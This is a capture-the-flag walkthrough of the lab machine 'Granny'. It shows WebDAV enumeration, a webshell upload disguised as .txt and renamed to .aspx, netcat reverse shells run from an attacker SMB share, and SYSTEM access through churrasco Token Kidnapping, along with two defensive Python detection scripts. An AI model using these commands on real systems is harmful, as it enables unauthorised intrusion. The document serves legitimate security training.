Introduction
IP: 10.10.10.15
OS: Windows
Today we have a Windows machine exposing an HTTP port whose server supports the WebDAV protocol. We will abuse WebDAV to upload a malicious webshell and get a reverse shell.
From there we will escalate privileges by exploiting MS09-012, better known as Token Kidnapping.
Enumeration
As usual, let's start by enumerating the open ports on the victim. Initially we run a TCP SYN scan, just a quick discovery of which ports are open:
# nmap -sS -p- --open --min-rate 5000 -n -v 10.10.10.15 -oN granny.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-05 07:13 CET
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Only the HTTP port is open.
Now let's run the default enumeration scripts and version detection against port 80:
# nmap -sC -sV -p80 -n -v 10.10.10.15 -oN granny.services
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| Server Date: Sat, 05 Feb 2022 06:22:24 GMT
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP enumeration
# whatweb 10.10.10.15
http://10.10.10.15 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/6.0], IP[10.10.10.15], Microsoft-IIS[6.0][Under Construction], MicrosoftOfficeWebServer[5.0_Pub], UncommonHeaders[microsoftofficewebserver], X-Powered-By[ASP.NET]
WebDAV enumeration
# davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_y_7smiTlFVPsum
********************************************************
Sending test files
PUT asp FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.pl
PUT shtml FAIL
PUT aspx FAIL
PUT cgi FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.cfm
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jsp
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jhtml
PUT php SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.php
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
PUT html SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
********************************************************
Checking for test file execution
EXEC pl FAIL
EXEC cfm FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
EXEC php FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.pl
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.cfm
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jsp
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jhtml
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.php
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
Executes: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
Executes: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
Foothold
WebDAV (Web Distributed Authoring and Versioning) is an extension to HTTP that lets clients edit remote content on the web. Basically, WebDAV enables a web server to act as a file server. Our victim, however, rejects uploads with the .asp or .aspx extensions (the extensions IIS hands to its script engine), while davtest showed that .txt files are accepted and served.
To bypass this restriction we can upload the file as .txt and then, once it is on the server, use the WebDAV MOVE method to rename the .txt file to .aspx. The extension check is applied to PUT but not to MOVE.
There is a command-line WebDAV client called cadaver which lets us upload the file and then move it:
cadaver http://10.10.10.15
dav:/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Alias: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/>
Let's upload a webshell:
# cp /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx .
# mv cmd.aspx cmd.txt
# cadaver http://10.10.10.15
dav:/> put cmd.txt
Transferiendo cmd.txt a '/cmd.txt':
Progreso: [ ] 0,0% of 1400 bytes Progreso: [=============================>] 100,0% of 1400 bytes exitoso.
dav:/> ls
Listando colección `/': exitoso.
Col: DavTestDir_y_7smiTlFVPsum 0 feb 5 07:27
Col: _private 0 abr 12 2017
Col: _vti_bin 0 abr 12 2017
Col: _vti_cnf 0 abr 12 2017
Col: _vti_log 0 abr 12 2017
Col: _vti_pvt 0 abr 12 2017
Col: _vti_script 0 abr 12 2017
Col: _vti_txt 0 abr 12 2017
Col: aspnet_client 0 abr 12 2017
Col: images 0 abr 12 2017
_vti_inf.html 1754 abr 12 2017
cmd.txt 1400 feb 5 07:42
iisstart.htm 1433 feb 21 2003
pagerror.gif 2806 feb 21 2003
postinfo.html 2440 abr 12 2017
dav:/>
dav:/> move cmd.txt cmd.aspx
Moviendo '/cmd.txt' a '/cmd.aspx': exitoso.
dav:/> ls
Listando colección `/': exitoso.
Col: DavTestDir_y_7smiTlFVPsum 0 feb 5 07:27
Col: _private 0 abr 12 2017
Col: _vti_bin 0 abr 12 2017
Col: _vti_cnf 0 abr 12 2017
Col: _vti_log 0 abr 12 2017
Col: _vti_pvt 0 abr 12 2017
Col: _vti_script 0 abr 12 2017
Col: _vti_txt 0 abr 12 2017
Col: aspnet_client 0 abr 12 2017
Col: images 0 abr 12 2017
_vti_inf.html 1754 abr 12 2017
cmd.aspx 1400 feb 5 07:42
iisstart.htm 1433 feb 21 2003
pagerror.gif 2806 feb 21 2003
postinfo.html 2440 abr 12 2017
dav:/>
If we browse to http://10.10.10.15/cmd.aspx we reach our webshell and can execute commands on the victim.
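From the defender's side, the PUT-then-MOVE trick leaves a clear trail in the web server's own logs. The following Python script is an added example written for this writeup, not code from the original post or from cadaver or davtest: it parses IIS 6 W3C log records (a constructed sample in the default field layout is embedded, with made-up timestamps and client addresses) and flags a client that uploads a non-script file, issues a MOVE against it and then requests a script-extension file with the same base name. The script-extension list is an assumption that should be adapted to the server's handler mappings.

```python
"""Correlate IIS 6 W3C log records to spot a WebDAV upload renamed to a script extension."""
from posixpath import splitext

# Assumption: extensions that IIS 6 hands to a script engine (adapt to the server's mappings).
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".shtml", ".shtm", ".stm", ".cer", ".cdx"}
# WebDAV methods that change server content; a success from an anonymous client deserves a look.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample log in the default IIS 6 W3C layout (spaces in user agents are logged as '+').
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2022-02-05 06:40:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2022-02-05 06:41:10 10.10.10.15 GET /iisstart.htm - 80 - 10.10.14.12 Mozilla/5.0 200 0 0
2022-02-05 06:42:03 10.10.10.15 PUT /cmd.txt - 80 - 10.10.14.12 cadaver/0.23.3+neon/0.30.2 201 0 0
2022-02-05 06:42:30 10.10.10.15 MOVE /cmd.txt - 80 - 10.10.14.12 cadaver/0.23.3+neon/0.30.2 201 0 0
2022-02-05 06:43:12 10.10.10.15 GET /cmd.aspx - 80 - 10.10.14.12 Mozilla/5.0 200 0 0
2022-02-05 06:43:40 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.33 cadaver/0.23.3+neon/0.30.2 201 0 0
"""


def parse_w3c(text):
    """Yield one dict per record, naming the columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed record: skip it rather than misalign the columns
        yield dict(zip(fields, values))


def successful(rec):
    """True for any 2xx response."""
    return rec["sc-status"].startswith("2")


def anonymous_writes(records):
    """Every successful content-changing WebDAV request made without authentication."""
    return [(r["c-ip"], r["cs-method"], r["cs-uri-stem"])
            for r in records
            if r["cs-method"] in WRITE_METHODS and successful(r) and r["cs-username"] == "-"]


def rename_to_script(records):
    """Flag: PUT of a non-script file, MOVE of that file, then a hit on the same base name with a
    script extension. IIS does not log the MOVE Destination header by default, so the correlation
    is on the file's base name per client; a MOVE that also changes the name is not caught here."""
    uploaded = {}  # (client, base name) -> uploaded path
    moved = {}     # (client, base name) -> uploaded path that has since been MOVEd
    alerts = []
    for r in records:
        if not successful(r):
            continue
        client, method, path = r["c-ip"], r["cs-method"], r["cs-uri-stem"]
        base, ext = splitext(path)
        ext = ext.lower()
        key = (client, base)
        if method == "PUT" and ext not in SCRIPT_EXTENSIONS:
            uploaded[key] = path
        elif method == "MOVE" and key in uploaded:
            moved[key] = uploaded[key]
        elif key in moved and ext in SCRIPT_EXTENSIONS:
            alerts.append({"client": client, "uploaded": moved[key], "executed": path})
            del moved[key]
    return alerts


if __name__ == "__main__":
    recs = list(parse_w3c(SAMPLE_LOG))
    for client, method, path in anonymous_writes(recs):
        print(f"anonymous write: {client} {method} {path}")
    for alert in rename_to_script(recs):
        print(f"ALERT: {alert['client']} uploaded {alert['uploaded']} and later hit {alert['executed']}")
```

On the sample, the anonymous-write list shows three successful writes and the correlation raises one alert for 10.10.14.12. Because the default log fields omit the Destination header, a rename to a different base name only shows up in the anonymous-write list, which is why both checks are kept; the more robust fix is to not expose WebDAV write methods to unauthenticated clients at all.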
Now let's get a reverse shell.
We will serve netcat over SMB from the attacker machine and have the victim run it straight from that share, so the command typed into the webshell is:
//10.10.14.12/a/nc.exe 10.10.14.12 444 -e cmd.exe
attacker# smbserver.py a .
AUTHENTICATE_MESSAGE (\,GRANNY)
[*] User GRANNY\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (HTB\GRANNY$,GRANNY)
[*] User GRANNY\GRANNY$ authenticated successfully
[*] GRANNY$::HTB:c86
root@kali:/home/alter/htb-vip/prep_oscp/granny# nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>
Privilege Escalation
We run some basic enumeration commands: whoami, whoami /all and systeminfo.
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE User S-1-5-20 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
GRANNY\IIS_WPG Alias S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 45 Minutes, 57 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 740 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,286 MB
Page File: In Use: 184 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
C:\WINDOWS\system32>
We see that SeImpersonatePrivilege is enabled and that the victim is a 32-bit Windows Server 2003 Standard Edition with a single hotfix installed, so we have all the information we need to escalate privileges.
We will abuse a vulnerability known as Token Kidnapping. In short, if you can run code under any service account on Windows Server 2003, you can take over the whole system, because Windows service accounts are allowed to impersonate.
And this is our case.
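The same assessment can be made quickly and repeatably on any Windows host. The Python below is an added example of mine, not code from the post or from churrasco: it parses the PRIVILEGES INFORMATION table that whoami /all (or whoami /priv) prints and the relevant lines of systeminfo, using constructed samples modelled on the listing above, and reports which token-related privileges the account holds and whether the host is a Server 2003 build where MS09-012 is the fix to check for. The privilege list is a triage heuristic chosen for this example, not an official catalogue.

```python
"""Triage whoami /all (or whoami /priv) and systeminfo output for token-impersonation risk."""
import re

# Privileges that let a process obtain, or act under, another security context.
# Assumption: a triage heuristic chosen for this example, not an exhaustive catalogue.
SENSITIVE_PRIVILEGES = {
    "SeImpersonatePrivilege": "can impersonate clients after authentication (Token Kidnapping family)",
    "SeAssignPrimaryTokenPrivilege": "can assign a primary token to a new process",
    "SeDebugPrivilege": "can open any process, including those running as SYSTEM",
    "SeTcbPrivilege": "acts as part of the operating system",
    "SeLoadDriverPrivilege": "can load kernel drivers",
    "SeBackupPrivilege": "can read any file regardless of its ACL",
    "SeRestorePrivilege": "can write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
}

# Constructed sample output, modelled on the listing from the box above.
SAMPLE_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

SAMPLE_SYSINFO = """\
Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.M)


def parse_privileges(text):
    """Map privilege name -> True when Enabled, False when held but Disabled."""
    return {name: state == "Enabled" for name, state in PRIV_LINE.findall(text)}


def parse_systeminfo(text):
    """Pull the OS version string and the installed hotfix identifiers."""
    version = re.search(r"^OS Version:\s*(\S+)", text, re.M)
    # Only the indented [nn]: lines directly under Hotfix(s): are hotfixes (Processor(s) uses the same layout).
    block = re.search(r"^Hotfix\(s\):.*\n((?:[ \t]*\[\d+\]:.*\n?)*)", text, re.M)
    return {
        "os_version": version.group(1) if version else None,
        "hotfixes": re.findall(r"\[\d+\]:\s*(\S+)", block.group(1)) if block else [],
    }


def assess(privs, sysinfo):
    """Return (severity, message) findings. A Disabled privilege is still held: the process can
    switch it on itself with AdjustTokenPrivileges, so it is reported as well."""
    findings = []
    for name, why in SENSITIVE_PRIVILEGES.items():
        if name in privs:
            state = "enabled" if privs[name] else "held but disabled"
            findings.append(("medium", f"{name} is {state}: {why}"))
    os_version = sysinfo.get("os_version") or ""
    if "SeImpersonatePrivilege" in privs and os_version.startswith("5.2"):
        hotfixes = ", ".join(sysinfo["hotfixes"]) or "none"
        findings.insert(0, ("high", "Server 2003 service account holding SeImpersonatePrivilege: "
                            "unless the MS09-012 update is installed, code in this context can reach "
                            f"SYSTEM (hotfixes seen: {hotfixes})"))
    return findings


if __name__ == "__main__":
    for severity, message in assess(parse_privileges(SAMPLE_PRIV), parse_systeminfo(SAMPLE_SYSINFO)):
        print(f"[{severity}] {message}")
```

On the sample this yields one high finding (Server 2003 plus SeImpersonatePrivilege with only Q147222 installed) and two medium ones, for SeImpersonatePrivilege and the disabled-but-held SeAssignPrimaryTokenPrivilege. The check is deliberately conservative about hotfix names: it reports what is installed and leaves confirming the MS09-012 update to the reader rather than hard-coding a KB number.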
In order to exploit this vulnerability we will use a tool called churrasco, which you can download from this repository:
We upload the churrasco.exe binary and the Windows build of netcat to the victim over our SMB share:
C:\WINDOWS\Temp\granny>copy \\10.10.14.12\a\churrasco.exe ch.exe
copy \\10.10.14.12\a\churrasco.exe ch.exe
1 file(s) copied.
C:\WINDOWS\Temp\granny>copy \\10.10.14.12\a\nc.exe nc.exe
copy \\10.10.14.12\a\nc.exe nc.exe
1 file(s) copied.
Now we just have to run churrasco, passing the netcat command as its argument, to get our reverse shell:
C:\WINDOWS\Temp\granny>ch.exe -d "C:\WINDOWS\Temp\granny\nc.exe -e cmd.exe 10.10.14.12 443"
ch.exe -d "C:\WINDOWS\Temp\granny\nc.exe -e cmd.exe 10.10.14.12 443"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x718
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x710
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\WINDOWS\Temp\granny>
root@kali:/home/alter/htb-vip/prep_oscp/granny# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\WINDOWS\TEMP>
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9